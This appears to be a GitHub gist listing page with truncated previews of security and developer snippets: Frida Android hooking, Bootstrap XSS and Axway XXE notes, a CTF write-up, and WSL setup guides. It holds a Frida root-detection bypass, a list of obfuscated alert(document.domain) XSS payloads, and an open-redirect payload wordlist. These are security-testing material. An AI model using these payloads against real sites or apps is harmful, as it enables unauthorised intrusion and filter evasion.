Skip to content

Instantly share code, notes, and snippets.

View abdilahrf's full-sized avatar

Abdillah Hasny abdilahrf

203 followers · 68 following
View GitHub Profile
@709924470
709924470 / hookNativeFunc.js
Created December 22, 2019 17:17
Frida android native hooking
// Android native hooks By @709924470
// CC-BY-NC 4.0
var moduleName = "libmain.so"; // Module name gose here
var hookFunctions = [
{
name: "Java_com_example_hellojni_getstr", // Function name goes here
onEnter: function(args){
// TODO: your code here
},
onLeave: function(ret){
@BlackFan
BlackFan / Bootstrap_XSS.md
Last active April 24, 2024 20:28
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

@leodutra
leodutra / -setup-windows-wsl-devenv.md
Last active April 5, 2024 23:44
Install and Setup Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font

Setup Windows Subsystem 2 for Linux

Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font

To setup native Linux, see this gist

Preview

Requirements

@zeropwn
zeropwn / Axway SecureTransport 5.x Unauthenticated XXE
Last active November 17, 2023 08:59
Axway SecureTransport 5.x Unauthenticated XML Injection / XXE
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
ATTENTION:
@stypr
stypr / a-z.md
Last active July 22, 2023 12:35
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)
@xynova
xynova / Enable WSL and Ubuntu 16.04 on Windows 10.md
Last active February 14, 2024 01:13
Enable WSL and Ubuntu 16.04 on Windows 10
@daniellimws
daniellimws / frida-tips.md
Last active April 5, 2024 21:56
Frida tips

Frida Tips

The documentation is so limited. A compilation of things I found on StackOverflow and don't want to have to search it up again.

Bypass root check

setTimeout(function() { // avoid java.lang.ClassNotFoundException

  Java.perform(function() {

    // Root detection bypass example
@tomnomnom
tomnomnom / alert.js
Last active April 23, 2024 20:42
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@EdOverflow
EdOverflow / open_redirect_wordlist.txt
Last active February 21, 2023 14:30
/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
@galpratama
galpratama / 4chan
Last active August 7, 2022 14:09
Buka Blokir Internet Positif. Caranya: https://support.rackspace.com/how-to/modify-your-hosts-file/
104.16.119.221 boards.4chan.org
104.16.59.249 i.4cdn.org